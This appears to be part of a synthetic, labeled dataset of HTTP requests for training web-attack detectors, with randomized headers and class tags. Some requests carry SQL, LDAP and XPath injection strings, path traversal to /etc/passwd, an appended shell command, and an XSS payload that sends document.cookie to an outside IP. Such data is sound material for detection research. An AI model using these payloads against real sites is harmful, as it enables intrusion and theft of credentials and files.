Accept-Encoding: *
Accept-Language: *;q=0.0
Cache-Control: no-transform
Client-ip: 83.101.237.247
Cookie: EmJ8Jewp-t=Cnulltohe>+t a0w);pitsygbeeo4t2=fsaiaal;ealet=4779;csrsthelsilaz=663
Cookie2: $Version="13"
Date: Thu, 08 Nov 07 09:24:48 UTC
ETag: W/"6cabhDopjWR86jSj8-"
Expect: lsfu4ai=3wee;e2mko=metMe
From: tubi@0dr5so.de
If-Modified-Since: Sat, 10 May 08 07:03:09 UTC
If-Unmodified-Since: Mon, 26 Mar 07 13:08:10 UTC
If-Match: *
If-None-Match: *
If-Range: Mon, 15 Sep 08 18:12:11 CET
Max-Forwards: 771
MIME-Version: 0.1
Pragma: no-cache
Proxy-Authorization: Basic ZGU2ZXRmdDoyeG1pc2lsTA==
Authorization: tAEi rgTfi=rqw6ehy
Range: 548411-,-37195
Referer: /daer1ea/hsons/pnoar/83Ct.bin
TE: deflate;q=0.3,gzip
Trailer: Warning
User-Agent: Mozilla/7.3 (X11; U; Open BSD i586 4.6; oc-aR; rv:4.6.8) Gecko/21572786
UA-CPU: Sparc
UA-Disp: 8582,573,32
UA-OS: Win95
UA-Color: color8
UA-Pixels: 8726x4401
Via: 5.2 74.26.175.225, HTTP/9.0 www.obtu.gif
Transfer-Encoding: identity
Upgrade: piFi/9.7, A4e1/7.0, 7lsnih/3.7
Warning: 149 www.nAoht.css "snts" 
X-Forwarded-For: 138.56.211.47
X-Serial-Number: 30599
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 38521
Start - Id: 36937
class: LdapInjection
POST /aJq/koGZ/D4ges5eH3cgohglbln/1s9a4i/e-j9O/aeeooEaentlns/Txp_nph-@i9cmdM/rkoenoorast/eh-wgxf/aQZ3T.htm? HTTP/1.0
Content-Length: 224
Content-Language: te,pasr6jEE
Content-Encoding: gzip
Content-Location: http://www.akttMy.uk/aCceOa/82irt/otatNT.swf
Content-MD5: bmV1bnQyaG45b3JyaXRuaA==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 27 May 07 05:57:46 GMT
Last-Modified: Sun, 07 Nov 04 19:31:59 CET
Host: 133.183.23.1
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.4
Accept-Encoding: 
Accept-Language: o-tusS
Cache-Control: max-age=6
Client-ip: 162.69.97.25
Cookie: 9mstr98jTnodmdr=nKat rcpO;zuf4wny5gBpepy=?3Sinh;rahirpsrulqset=5347749;EWBA1QxUxJv=9s;8ttsaw5rei=089
Cookie2: $Version="76"
Date: Fri, 06 Feb 04 11:19:44 GMT
ETag: W/"VLYpnQMTVayQbUA@8m@f"
Expect: 100-continue
From: nareu4te@pple4n.it
If-Modified-Since: Tue, 30 Jan 07 24:04:59 UTC
If-Unmodified-Since: Fri, 13 Aug 04 23:34:59 UTC
If-Match: *
If-None-Match: *
If-Range: Tue, 18 Aug 09 05:49:50 CET
Max-Forwards: 76
MIME-Version: 5.9
Pragma: no-cache
Proxy-Authorization: Basic NG9lYWFkZTM6b25zZXhzdGM=
Authorization: letuea twhinkhx=ohaif
Range: 21-,49196-
Referer: http://www.ngiv1nal.ch/ton75wE/wuarz.mpeg
TE: chunked,trailers
Trailer: Accept
User-Agent: hxqTDt http://www.ocnelE.net
UA-CPU: PowerPC
UA-Disp: 1845,7989,16
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 3317x800
Via: HTTP/2.9 51.234.117.99
Transfer-Encoding: anaeip; aruqea=n4he0rf9
Upgrade: bnd/1.0, Soltt/0.3, thel6o/5.8, isuyna/8.9
Warning: 200 169.156.209.196:92 "0oiSeraRieyyto" "Thu, 26 Aug 04 15:57:50 UTC"
X-Forwarded-For: 76.215.12.133
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

ed=11336&o7=on4n1i v&ien=hcigc75a&jsdo8wnf=3966)(&(objectClass=era)(|(sn  =  Pes)(cn=o    J*))&hdEjlznae=uOrs&ciidCkn=10583&hotqe=9tedjauZtne&ontlGawsah=4030297&passwdAvpjFL7FG=6tfs49heotmaocbEt

End - Id: 36937
Start - Id: 35100
class: SqlInjection
GET /tHZxb8heLpbUbysdA./woEh/WHg.sElq/hrtncs5.png? HTTP/1.0
Host: 81.187.1.64
Connection: close
Accept: */*;q=0.0
Accept-Charset: *;q=0.1
Accept-Encoding: 
Accept-Language: tahb-aeww;q=0.0
Cache-Control: min-fresh=402
Client-ip: 186.212.136.62
Cookie: thRol4=ekY2y;lzerajd1ld='    )  UNION  ALL    SELECT     726,3722,30,408,4941   FROM    erpvtdtf     WHERE   (   ''  =  ';akrsoetb8mathe=506552853
Date: Sat, 01 May 04 03:35:40 GMT
ETag: W/"rxq4LoFVb5IbCGNLEAl"
Expect: 100-continue
From: iomcsT@steee.cz
If-Unmodified-Since: Fri, 25 Apr 08 22:14:31 CET
If-Match: "ADwkOiYRZdQnZQZIfSt"
If-None-Match: *
If-Range: "otSNtl_yC9CvK4s"
Max-Forwards: 644
Pragma: no-cache
Proxy-Authorization: 9esniq Uadtnog=kHioniye
Authorization: Digest opaque="bete"
Referer: /ewlW4noy/zpna.swf
TE: trailers,deflate;q=0.7,chunked;q=0.2
Trailer: Range
User-Agent: Mozilla/2.6 (compatible; 5seue6dr; Linux i386; emImbs7n)
UA-CPU: Sparc
UA-Disp: 6684,2731,32
UA-Color: color32
Via: 0.2 www.wotttz.png
Transfer-Encoding: deflate
Warning: 874 167.83.202.83 "dOrvOwtenst7t2ivdo7" 
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 35100
Start - Id: 42394
class: SqlInjection
GET /Wh37_FB0gGMU/dWgCn-8hIqC45.CjaV/hwooapqtTAUEci/si/oolletocaWgae/hhlNJ/aZyunp9ihIbTHACnjZ7/scripteJn9/tltaeiqiSP/sMfrhoFHf6K/mesolioHceezmeWvw.jpeg?bgJV=and+++++0%3C%3E%28select+++++count%28*%29+from+++a2uars++++where+++ar%3C%3E%29&ttUeencth=bCsCxE3vqn&hijghLrtesno=aeHcvsptm9ehsf2ntn HTTP/1.0
Host: 220.107.93.8:365
Connection: close
Accept: image/*, application/postscript
Accept-Charset: *
Accept-Encoding: *;q=0.2
Accept-Language: *
Cache-Control: min-fresh=2
Client-ip: 173.58.91.50
Cookie: y4etin=orBehhkb;4Ssaernsb4ii=1;scriptvkwDHtelnet9Tr=31;NsrWoqlrns=y$
Cookie2: $Version="2"
Date: Wed, 01 Feb 06 16:12:07 GMT
ETag: W/"3JMJ9i3BhEbYdlSnPe"
Expect: 100-continue
From: aespw@dgaxhlomnn.it
If-Modified-Since: Tue, 13 Jan 04 14:07:48 GMT
If-Unmodified-Since: Sat, 13 Mar 04 19:23:44 GMT
If-Match: "r5NTx6DAobWciNVPbC7N"
If-None-Match: *
If-Range: "0cRJE1AYKjkFNbgsoNfX"
Max-Forwards: 9
MIME-Version: 2.7
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: hVsby7 Ii6eef=veeOhti
Range: -012964
Referer: /sat2x/tols/ctgs6/zlsxo.dll
TE: trailers,deflate
Trailer: Host
User-Agent: Mozilla/7.4 (compatible; ieie; Open BSD i386; mntrtl)
UA-CPU: StrongARM
UA-Disp: 791,8136,16
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 3589x325
Via: 8.4 www.rndsj.shtml, 5.4 173.146.54.217
Transfer-Encoding: deflate
Upgrade: rse/1.1, o5mn/7.6, zlr3/8.8, or7Eaa/3.4
Warning: 999 147.111.219.75 "f2re1Ss" 
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 42394
Start - Id: 36612
class: OsCommanding
GET /scripts/file.bat" & dir c:/ .exe? HTTP/1.1
Host: 112.41.180.234:3254
Connection: s5sbaSer
Accept: audio/*;q=0.4
Accept-Charset: *
Accept-Encoding: gzip;q=0.0, identity
Accept-Language: ntaabt4c-eWh;q=0.6, ottH4-pst9;q=0.3
Cache-Control: max-stale=8
Client-ip: 34.3.142.249
Cookie: optR@lTX6Bz=99020;4b2W7=~ylo<oyieto+t)n;Ze79e0okemis=3
Cookie2: $Version="9"
Date: Wed, 28 Oct 09 08:54:02 CET
ETag: "3FW1P6WeZ_tcD9N"
Expect: 100-continue
From: femsa@iitoSokm9u.de
If-Modified-Since: Thu, 09 Jun 05 17:45:17 UTC
If-Unmodified-Since: Tue, 27 May 08 07:03:18 CET
If-Match: *
If-None-Match: *
If-Range: Sat, 21 Jul 07 02:16:37 CET
Max-Forwards: 5134
MIME-Version: 1.9
Pragma: dpags=th2dia
Proxy-Authorization: Basic RWViaWU6ZWh6c3JkYw==
Authorization: Iatlna 3ewswd=s2sgthfz
Range: 31826-
Referer: http://eRjgNC.be/sernz/erwnora.gif
TE: trailers
Trailer: If-Match
User-Agent: e20re (iApdmq; rWUJhlf7f; eguxFo_m; glZsGgU)
UA-CPU: MIPS
UA-Disp: 5747,1006,32
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 477x077
Via: 1.2 82.127.181.191, 1.6 150.68.28.50
Transfer-Encoding: deflate
Upgrade: hr8so/4.0, h23/1.4, yud3rE/6.4, xdnou/0.4, bIe4Er/8.9
Warning: 933 www.oecji.html "M3c95ra8" "Thu, 10 Dec 09 13:28:45 UTC"
X-Forwarded-For: 68.142.150.165
X-Serial-Number: 0686987
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36612
Start - Id: 46104
class: PathTransversal
POST /pthtVkTeedsaea.aspx? HTTP/1.1
Content-Length: 197
Content-Language: 45ie4a6,fttslz
Content-Encoding: deflate
Content-Location: /oseSre/eee34rt/tnnatbeA.asp
Content-MD5: dGJtZU90emVuaWZ0QXRObA==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 15 Jul 09 17:14:25 CET
Last-Modified: Tue, 06 May 08 15:40:14 UTC
Host: 154.90.160.96
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-arabic;q=0.8, iso-8859-15;q=0.6, utf-8, x-mac-chinesesimp;q=0.3
Accept-Encoding: *
Accept-Language: t-st5caiz3;q=0.8, waaeuln-ooeuDsn, eea5-9y, a7lo-5ugt;q=0.6
Cache-Control: max-stale
Client-ip: 78.173.68.149
Cookie: LCphpSounionKopenqJ=309;rn=tUeXyVt7X;0eeataoqa=nodei0a51-ttls3+twtPn;y7ieITlq1ltydt=d;lensosnl4n8udn=s;tCZnm.yU==D;
Cookie2: $Version="6"
Date: Mon, 05 Apr 04 08:05:55 UTC
ETag: W/"RQOwSVWoeJGj0tXwiO"
Expect: 1riwi
From: ovnitL@umeod.net
If-Modified-Since: Sat, 13 Dec 08 17:53:18 GMT
If-Unmodified-Since: Mon, 16 Oct 06 18:24:27 CET
If-Match: "2p9_frFJ2YcaJJHmeX"
If-None-Match: "hwUzFG@BWJObkzhZv0"
If-Range: *
Max-Forwards: 260
MIME-Version: 0.9
Pragma: no-cache
Proxy-Authorization: NTLM N3lkaXZoNXRmcmFuaG9sYWRuYWlkbm90YW9lZHBqZUlob0F5ZU5h
Authorization: Digest uri=http://www.wuCi.uk/Ab4jhqe/loemhf/deenLse/6tobu.php
Range: -03018,-4474
Referer: http://www.stnwvh.it/ecsdro/xEet/tsxn.mdb
TE: chunked;q=0.0,chunked,trailers
Trailer: Trailer
User-Agent: in3BMPX http://www.iuo5iom.net
UA-CPU: x86
UA-Disp: 013,8329,8
UA-Color: color32
UA-Pixels: 1090x096
Via: FTP/7.0 www.ag4QOTl.png, 5.5 185.111.24.26, eennh/5.7 185.15.65.49
Transfer-Encoding: gzip
Upgrade: vecj/8.8, yebd/9.0, jn0/6.9, OasdIr/4.2
Warning: 952 www.hhNewo.css "1l2t" "Sun, 16 Oct 05 14:27:34 CET"
X-Forwarded-For: 12.245.148.199
X-Serial-Number: 4642917448355
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

t7=Eclisi&tsttnseh9jd=hafsoo%ai&br=2)rs$&e10n=ysnteavOebf5Af&@J28inputaHa7=/etc/passwd&recsymaesc=aaec%Isrft\4Hae&Snc41agEfN=8485709210&FfsNr1cl=rouxmlbineewnTbmn@\&bf9s0xr=227790

End - Id: 46104
Start - Id: 37583
class: LdapInjection
POST /aenOre/rrtpumrrtiHSgdbabl/anq0aeqhb/-pEeLYk.2Ibgsound/a2/ezuuZf889f.9RuZem_/nAQZyJUpvUZ/cnnsoew37nex86t.html? HTTP/1.0
Content-Length: 207
Content-Language: 3pwks,Rq
Content-Encoding: deflate
Content-Location: /uo3aO1r/a1rat/hulsPEH/owseeaar.pl
Content-MD5: c2FsRW9lRmNPYWFucHRpZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 09 Oct 04 05:20:42 CET
Last-Modified: Wed, 20 Oct 04 17:26:48 GMT
Host: www.aknnA1A0t.gov
Connection: close
Accept: video/mpeg;q=0.9, video/quicktime
Accept-Charset: iso-8859-15, iso-8859-6, euc-jp, iso-8859-5;q=0.8, isiri-3342;q=0.1
Accept-Encoding: deflate, compress, deflate, gzip;q=0.8
Accept-Language: tt4tsi-0fdntr6z, 8uaiLt-tnnAax;q=0.3, r-sacly, pxa8clsa-aarew;q=0.0
Cache-Control: max-stale
Client-ip: 234.104.82.80
Cookie: bQYWx=Lll;uaLm15ulroyx=336821;mOotaznyo=0330942;h4ceelyf=418;mochalexeccAvRW=fsqe;trrsftt=nbooTdlodg
Cookie2: $Version="58"
Date: Wed, 11 Feb 09 22:34:22 UTC
ETag: W/"da4gNFk3QNSW1bCYzLD"
Expect: 100-continue
From: Stnfsrr@eacmtr.gov
If-Modified-Since: Wed, 21 Nov 07 07:35:36 UTC
If-Unmodified-Since: Wed, 30 Jul 08 07:50:37 UTC
If-Match: *
If-None-Match: "OLADb.qgfnfqTeE0"
If-Range: "EZcEIGGNScuJwRJ"
Max-Forwards: 6
MIME-Version: 7.0
Pragma: no-cache
Proxy-Authorization: NTLM aTZvdWFhYXRpUjU2T2xTZW9lbnRudHdsbm9YbjRlbnJuYg==
Authorization: NTLM UnJueW5CZWhpemhwYWJzTmZjaDNvZWx5eXNyaGlocmVhdHRsZXRvY2NhZHRrcm8=
Range: 9-357
Referer: http://www.hytehL.cz/saeanh/rtse/gwo31/tYsas/a6oA.ace
TE: deflate;q=0.6,chunked
Trailer: If-None-Match
User-Agent: Mozilla/8.0 (Windows; U; Win98 4.8; ub-is; rv:6.2.1) Gecko/54340778
UA-CPU: PowerPC
UA-Disp: 1243,740,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 4454x553
Via: HTTP/7.6 40.145.238.130, Ieeeto/5.5 www.clbf.htm, 9.8 www.i69or.js:58
Transfer-Encoding: gzip
Upgrade: artg/9.7, Boy/7.1, oiE/0.1, mladno/7.3, Ni9/4.6
Warning: 403 254.22.140.185:97 "tfj3g2" 
X-Forwarded-For: 111.32.250.246
X-Serial-Number: 35518631146538
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

tLz0Do9af2-=ywheree&obaremr0nenatoU=nsoI|&l4teuap=ouhao8ntbiheSt&asnal2d3o2a=eJsh&0Cij8s=<oi&eli=)    (   |  (displayName=had*)    (name=  had*   )(mail=had*  )&Xr3EKgMuLfi=397443

End - Id: 37583
Start - Id: 36879
class: LdapInjection
GET /eOemnhntpdatiuzaa.php4?bsonnm=tvpRepbuk&9Qimeh=lacgroup+by+t8n+rtjgl&a0lionbeeeie0e=coid7iutowkiis&EonxmTl4dn4=4t%5DcinaUne&Ea=bsfhyai&dnamhsAi4heshr=Tlinktt+tts8oomoga&sojta1e84Eax=7803233&ArnYrxrcqdern8h=tgA9&ji=39899002&1uRt=iv04qc5 HTTP/1.0
Host: www.dtet1s.org:80
Connection: keep-alive
Accept: */*;q=0.9
Accept-Charset: *;q=0.9
Accept-Encoding: identity, compress, compress, deflate
Accept-Language: *;q=0.7
Cache-Control: no-store
Client-ip: 154.207.127.41
Cookie: aa=Oim;siYGDDL36zP4=auee)(&(objectClass=  os*)
Cookie2: $Version="86"
Date: Fri, 29 Sep 06 16:12:48 UTC
ETag: "58gU5qryzi_xKprDb50"
Expect: 100-continue
From: hlie@ettef.de
If-Modified-Since: Fri, 09 Dec 05 07:53:09 CET
If-Unmodified-Since: Mon, 22 Mar 10 23:08:40 CET
If-Match: "zYRRM7EqLEIO8OMr"
If-None-Match: *
If-Range: *
Max-Forwards: 9512
MIME-Version: 1.2
Pragma: no-cache
Proxy-Authorization: tittt SszhsJl=itA3crq
Authorization: 9neoo Ziuic=aebteoqh
Range: -348635
Referer: /o9cs/8erab/orro.css
TE: trailers
Trailer: If-Modified-Since
User-Agent: Mozilla/1.6 (Machintosh; U; Mac OS X 8.0; ps-Ta; rv:4.5.7) Gecko/29984634
UA-Disp: 1108,5014,32
UA-OS: Win9x
UA-Pixels: 5144x8238
Via: HTTP/0.3 www.Ao4snmah.tiff, FTP/1.5 96.238.82.134
Transfer-Encoding: gzip
Upgrade: nrT/9.9
Warning: 328 71.142.30.136:77389 "ttnaaextoqsiIoo" "Fri, 15 May 09 15:18:30 CET"
X-Serial-Number: 0500322312
----: --------------------------------------------

null

End - Id: 36879
Start - Id: 45893
class: PathTransversal
GET /ETstdinR/n45TapWGFudNH7qMp/aeqedehaYrc2whwb.exe?olnowd8quKmih=reNtr1relscriptr&rnutiheinslcia=..........................WINNTsystem.ini&lhqyocrieufsfi=sllnms9BauO HTTP/1.0
Host: 147.117.175.73
Connection: 3roTprsm
Accept: audio/x-wav;q=0.7, application/postscript;q=0.5, audio/*;q=0.9
Accept-Charset: x-mac-arabic, gb2312, iso-2022-jp, iso-10646-ucs-2
Accept-Encoding: *;q=0.3
Accept-Language: nyl-hhChy;q=0.0, nh-ncey;q=0.9, noy-dehooi;q=0.3, ldol-e1cnabes;q=0.2, Oiavhith-ltrhn;q=0.1
Cache-Control: min-fresh=010
Client-ip: 191.79.240.211
Cookie: 7aItitahs=tCeLecnx2wiieiymEc;7otrtestusdn=4>t;dslgnlAyxsvy=67
Cookie2: $Version="33"
Date: Thu, 06 Mar 08 23:50:06 CET
ETag: W/"HxqwZITyDf0T7olEZiF"
Expect: 100-continue
From: erymey@jq6fn.org
If-Modified-Since: Wed, 04 Feb 09 12:20:28 UTC
If-Unmodified-Since: Thu, 18 Jun 09 17:18:34 CET
If-Match: *
If-None-Match: "pF96COZNMlFL-krdDdaS"
If-Range: Tue, 03 May 05 23:11:10 CET
Max-Forwards: 18
MIME-Version: 5.1
Pragma: zia2=boew3E
Proxy-Authorization: omjasV v1Eoao=notim
Authorization: Digest uri=http://rwr7.cz/p4hn/tem4/aybte3e/orupse.dll
Range: 58-182597,4-9
Referer: /73preeb.php3
TE: trailers
Trailer: TE
User-Agent: 6M9_c8 http://www.hdnpad6a.cz
UA-CPU: StrongARM
UA-Disp: 567,3273,32
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 925x5091
Via: ooieti/9.3 88.252.154.57
Transfer-Encoding: compress
Upgrade: iedr/6.7, enx/4.7
Warning: 813 www.vtuj27.png "rsxiUrrhinfa" "Sun, 10 Aug 08 15:25:17 UTC"
X-Forwarded-For: 121.121.166.30
X-Serial-Number: 42462997439342204016
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45893
Start - Id: 47790
class: XSS
GET /eCyUdfmX8_fQoIf28/YEZdTwe.Rv@EO/Vw_1qP6bqzservicesdIA/jE401ztrexec/jNCfU8y2CCB3bz-/S8g7MV-EH/nuutkchg2hcmtrseu2/jAzv/ubtcEmrteorSan7/odsc16zD.dll?chqtnweloae=btn%29%5B6phpl&tdI9l3nftphdt=8&qur=44%40sf&erstsgk68s=%3C%3Cscript++%3E%5Bwindow.open%28%27http%3A%2F%2F117.178.218.173%2Ftori.pl%27%2Bdocument.cookie%29%3B%5D%3C%2Fscript+++%3E&ipngn3otdEasof=SlbFlikelgoio8tbfsOh HTTP/1.0
Host: www.omvndnTwi.be:80
Connection: close
Accept: */*
Accept-Charset: *;q=0.7
Accept-Encoding: *
Accept-Language: emtoewm-vnoi3o, trOq-nurmeg9a, todhJ4b-fjqtco
Cache-Control: min-fresh=67
Client-ip: 153.244.215.138
Cookie: egn1hliaee=uyivht9ahiIia4;iGmHo=snDbnrdm
Cookie2: $Version="70"
Date: Thu, 31 Mar 05 24:03:57 UTC
ETag: W/"0gwgQpp6mZtSr2.Zvl"
Expect: 100-continue
From: dRkiaeue@o6si.cz
If-Modified-Since: Tue, 08 May 07 01:42:59 UTC
If-Unmodified-Since: Mon, 17 Jan 05 07:53:36 UTC
If-Match: *
If-None-Match: "d6BRANSFN99dGsRj"
If-Range: *
Max-Forwards: 215
MIME-Version: 8.5
Pragma: itl9loht=bubk
Proxy-Authorization: Digest username="oaid"
Authorization: NTLM YW53ZW5obWVybU1tZW5ldGxjbmg0Z2xhaW50aW9yZGFwOGM=
Range: 9830-
Referer: /terEsp.css
TE: gzip,gzip,gzip
Trailer: Accept-Language
User-Agent: Mozilla/5.5 (compatible; Konqueror/5.3; Linux i586; iAimge; d2x7abumq; 4thTeiB)
UA-CPU: PowerPC
UA-Disp: 1153,3781,32
UA-OS: Win98
UA-Color: color32
UA-Pixels: 7737x1025
Via: HTTP/5.7 www.shee.css, 7.1 www.eq7hScEo.css
Transfer-Encoding: compress
Upgrade: zbercb/3.5, lhe1/8.6, HsR/8.3, ne6enE/3.6
Warning: 348 www.lhsep.png "gefrthtkaanhwheldAc" "Sat, 20 Mar 10 09:17:23 UTC"
X-Forwarded-For: 208.82.57.120
X-Serial-Number: 14491
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47790
Start - Id: 46343
class: PathTransversal
GET /lNewbsaD2fo@FcgZcq.7/hxZ9JEG/eimieeeeOeiztiasb/3dlsesnewrxlf/a-AS6q/ievkfiisfehn6sr.sh?l6ee4Ari7=5707&stiewyrn1pninde=4xa&PfmetaUtH=3updatezea&2bts21t=%5C.%5C.%5C%2F%5C.%5C.%5C%2Fetc%5C%2Fpasswd HTTP/1.1
Host: www.sler42ya.it:0928
Connection: keep-alive
Accept: */*;q=0.9
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.9
Cache-Control: max-stale=1
Date: Sun, 14 Jan 07 10:52:20 UTC
If-Modified-Since: Wed, 24 Sep 08 10:42:33 UTC
If-Match: *
If-None-Match: *
Max-Forwards: 8
Authorization: Basic bHMyMzpVbDFzYWU=
Referer: http://www.befhq.cz/ox7ne/wrtwt4/itcaedo.tiff
Trailer: Proxy-Authorization
User-Agent: Mozilla/7.1 (X11; U; Linux i586 4.3; 2l-su; rv:2.6.1) Gecko/46125286
UA-Pixels: 648x2225
Transfer-Encoding: deflate

null

End - Id: 46343
Start - Id: 38900
class: LdapInjection
GET /7xfC6sOPjWmzY6c-_1C/d@/9XAluJ_1vdymyhana/Sqc8Leo/3z8VJxqJ3lKsz.nsf?emN1b-@WvJ-4=HanLr%27psfN&tsm=cllAr&Tk3lsBiframeBTl=6105144165&fbgsoundwWXpshome9Y8H=nlaNroietb0mhve&VHformDQThP=nkhroer&eot=hn9tg%29%28%26%28objectClass%3D++++vueq*%29&aeuhAleSmer=m4&sb7bghr=22 HTTP/1.0
Host: www.ktpe3hxc.gov:038
Connection: niwwnoe
Accept: image/gif
Accept-Charset: iso-8859-5;q=0.8
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Cookie: eLpiwee=vuLvdearnlettler;Yhhya=dtihwpNaeihChbear;et=Hi]iEprocessing-instructioneiframehome as r ;iWro=haaXe;seExtiss=oqepgoroiiur
Date: Mon, 08 Mar 10 01:55:57 GMT
ETag: W/"2GEamMx-ggUI9_T@t"
Expect: fnIaiakT
If-Unmodified-Since: Wed, 03 Mar 04 18:11:01 GMT
If-None-Match: "eyIu.KcSXMHLwuIsr."
If-Range: Fri, 17 Nov 06 15:17:21 UTC
Max-Forwards: 3
Pragma: no-cache
Authorization: Basic bWxvd2U6ZTBvbmg=
Range: 423-568,877941-960,834220-453
Referer: /l33f0/stniel/nulpceL4.gif
TE: trailers,gzip;q=0.2,trailers
Trailer: Connection
User-Agent: Mozilla/4.7 (X11; U; Linux i586 3.5; 7i-ww; rv:5.8.3) Gecko/02687948
UA-OS: Solaris
Via: HTTP/4.6 237.228.72.177, 2.1 158.140.66.100:3120, HTTP/0.9 59.86.37.247:6
Transfer-Encoding: gzip
X-Serial-Number: 99898684535119255

null

End - Id: 38900
Start - Id: 48178
class: XSS
PUT /tqxB7_gconnectr0L/jwvHC@anrD.css? HTTP/1.0
Content-Length: 65
Content-Language: p0afoia,tni,8
Content-Encoding: compress
Content-Location: /nsnt.php
Content-MD5: RWJpa3JsdHRrdGV3NVBlYw==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 12 Nov 06 16:51:52 GMT
Last-Modified: Fri, 26 Sep 08 17:04:41 GMT
Host: 34.65.139.58
Connection: close
Accept: video/*, text/*;q=0.8
Accept-Charset: iso-8859-5;q=0.7, iso-2022-jp, iso-8859-6;q=0.4
Accept-Encoding: <style    ><!--</style  ><script  >[alert('kwoe');]//--></script >
Accept-Language: e-d3dI, rtry-hnZ7s
Cache-Control: only-if-cached
Client-ip: 148.144.232.153
Cookie: ntpx44=o w$ip&tnib9qF;1vFdeleteyZ=hnsgs;Fahey9ntC5hhlo=0664062;tRaaixfiseft=wliboulzmboot.inisWeTlSea2wm;or20hearaosso=sxrtsobxtis0ie8s
Cookie2: $Version="91"
Date: Sat, 28 May 05 09:18:04 UTC
ETag: "A-ImLVPj9nwSRdku"
Expect: 100-continue
If-Modified-Since: Fri, 27 Apr 07 11:06:59 GMT
If-Unmodified-Since: Mon, 04 Jul 05 14:32:32 GMT
If-Match: "W8BJPu0fB2QzhcdB"
If-None-Match: *
If-Range: Thu, 04 Oct 07 01:12:33 GMT
Max-Forwards: 1843
MIME-Version: 0.7
Pragma: no-cache
Proxy-Authorization: Digest username="Nbcsty"
Authorization: Digest nc=11B11BAE
Range: 252-,4-47,9983-
Referer: /9uelftr.pdf
TE: deflate,trailers,chunked;q=0.6
Trailer: Range
User-Agent: lEYm7eDetisxsc
UA-Disp: 926,8217,8
UA-Color: color8
Via: 6.6 www.67rl33fb.css, HTTP/6.3 www.e1aaw.png, 2.0 223.105.12.194:3436
Transfer-Encoding: compress
Upgrade: npg/1.4, eytlw/7.1, c0eo/3.9, erE/1.1, nzxjer/8.0
Warning: 505 20.155.179.30 "pllnsh" "Sat, 12 Dec 09 10:14:04 GMT"
X-Forwarded-For: 203.248.86.3
X-Serial-Number: 43100124354483
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

zps0ns5sjuow=ot$taouofh&csfP6oag=585&sdtt1oooshd=eo\mbe$h69

End - Id: 48178
Start - Id: 37224
class: LdapInjection
GET /uo/0tUT44zScpVjOX0F8/Pandlog@C7R84/6union8iuNhB@P7FG1j/h@.QN0aAoXqV/eAhrt4nituuieoap/a7ostg7telhGa5/r4eOepimas6LolJNlh/ay1ttlr/PjEDrFw.asp?ix5MSanni=%40oiEenm3+tf&mi=tsub5dnolpnR&ghIn4rHmeuie=aw3R6&ia=%22%29%28targetfilter%3D%28o%3DNetscapeRoot%29%29&ms0Desrb=mtEsr&vdgarsntrri6otj=tNe&FeXc=d0ri4otra&tnettL=adocumentln0utd+th4&ii1j9=e&rcdN=h&0dZ=663305&_nayl=axCqdKa8eL&meevaehgewlo=35&siroaeIn=wibLAY HTTP/1.1
Host: 137.242.175.88
Connection: close
Accept: */*;q=0.5
Accept-Charset: *;q=0.9
Accept-Encoding: 
Accept-Language: *;q=0.7
Cache-Control: max-age=7353
Client-ip: 60.153.84.246
Cookie: aubaeit=htdozear;BuaHt4hla0=41
Cookie2: $Version="943"
Date: Sat, 18 Apr 09 11:37:42 CET
ETag: "czNQPVvyxU6hhOg3"
Expect: eesgne
From: soETt@snjTsesiy.ch
If-Modified-Since: Sun, 04 Dec 05 05:15:31 CET
If-Unmodified-Since: Sat, 31 Mar 07 15:28:42 UTC
If-Match: "WUclZDkjrH9trt3mOL"
If-None-Match: *
If-Range: "83QeKP2tOsIEuL.Is_H"
Max-Forwards: 8900
MIME-Version: 2.4
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: Basic ZUFyYzpod2Q4b3loYw==
Range: -035
Referer: http://www.otfmwioT.cz/s9gbdy/ueay/ososcro/ewyecies/mcnaun.js
TE: deflate;q=0.0,trailers
Trailer: Max-Forwards
User-Agent: ctoltit4
UA-CPU: Sparc
UA-Disp: 5765,446,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 0874x8291
Via: 8.1 www.osniapu.css, nnpfg/8.0 213.147.44.108
Transfer-Encoding: deflate
Upgrade: TrRiy/4.3, rsibt/9.4
Warning: 553 www.Nftmdh.html "rnvarnu59oDgV" "Mon, 31 Oct 05 08:57:55 UTC"
X-Forwarded-For: 217.7.45.94
X-Serial-Number: 496450931195263351
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37224
Start - Id: 49339
class: XPathInjection
GET /lwheresEdYbfrombetweenpo/mlNuatlene/pm/ezUreplacet0_Q2S/suUAVB/v.MuE/hnhohw/dereSPHVEHjV.exe?aeBkqnoy=146428528&n6rU2obEfn=998076&d9Ir=2809&DjER_=nr2sour9e6luda&ynhsstYsW=hy%27+or+++path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3DN%5D+++or+++++%27nb%27%3D%27 HTTP/1.1
